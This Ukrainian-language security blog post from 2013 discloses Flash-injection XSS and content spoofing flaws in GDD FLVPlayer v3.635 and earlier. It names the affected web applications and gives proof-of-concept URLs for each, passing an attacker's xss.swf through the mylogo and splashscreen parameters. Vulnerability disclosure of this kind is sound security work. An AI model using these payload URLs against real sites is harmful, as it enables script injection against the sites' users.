Websecurity - Веб безпека

Сьогодні я виявив Content Spoofing та Cross-Site Scripting уразливості в численних веб додатках з GDD FLVPlayer.

Раніше я писав про уразливості в GDD FLVPlayer. Це популярна флешка, що знаходиться на тисячах веб сайтів і яка використовується в багатьох веб додатках.

Зокрема в Order Master Pro, CMS Pask (Pixelwerk admin), gddflvplayer для MODx, Pixelfind Administrator, WHMCompleteSolution. Та в інших веб додатках. А також цей флеш відео та аудіо плеєр використовується на багатьох сайтах як самостійний веб додаток.

XSS (через Flash Injection) (WASC-08):

Order Master Pro:

http://site/op/video/gddflvplayer.swf?mylogo=xss.swf
http://site/op/video/gddflvplayer.swf?splashscreen=xss.swf

CMS Pask 3 (Pixelwerk admin):

http://site/gddflvplayer.swf?mylogo=xss.swf
http://site/gddflvplayer.swf?splashscreen=xss.swf

gddflvplayer для MODx:

http://site/assets/snippets/gddflvplayer/gddflvplayer.swf?mylogo=xss.swf
http://site/assets/snippets/gddflvplayer/gddflvplayer.swf?splashscreen=xss.swf

Pixelfind Administrator:

http://site/includes/flash/gddflvplayer.swf?mylogo=xss.swf
http://site/includes/flash/gddflvplayer.swf?splashscreen=xss.swf

WHMCompleteSolution:

http://site/player/gddflvplayer.swf?mylogo=xss.swf
http://site/player/gddflvplayer.swf?splashscreen=xss.swf

Наведені XSS уразливості, приклади 8 СS уразливостей дивитися у вищенаведеному записі. Вразливі веб додатки, що використовують GDD FLVPlayer v3.635 і попередні версії.

Вразливі наступні веб додатки: усі версії Order Master Pro, CMS Pask 3 (Pixelwerk admin v.3.3) і попередні версії, усі версії gddflvplayer для MODx, усі версії Pixelfind Administrator та усі версії WHMCompleteSolution.

This entry was posted on 23:56 23.08.2013 and is filed under Уразливості. You can follow any responses to this entry through the RSS 2.0 feed.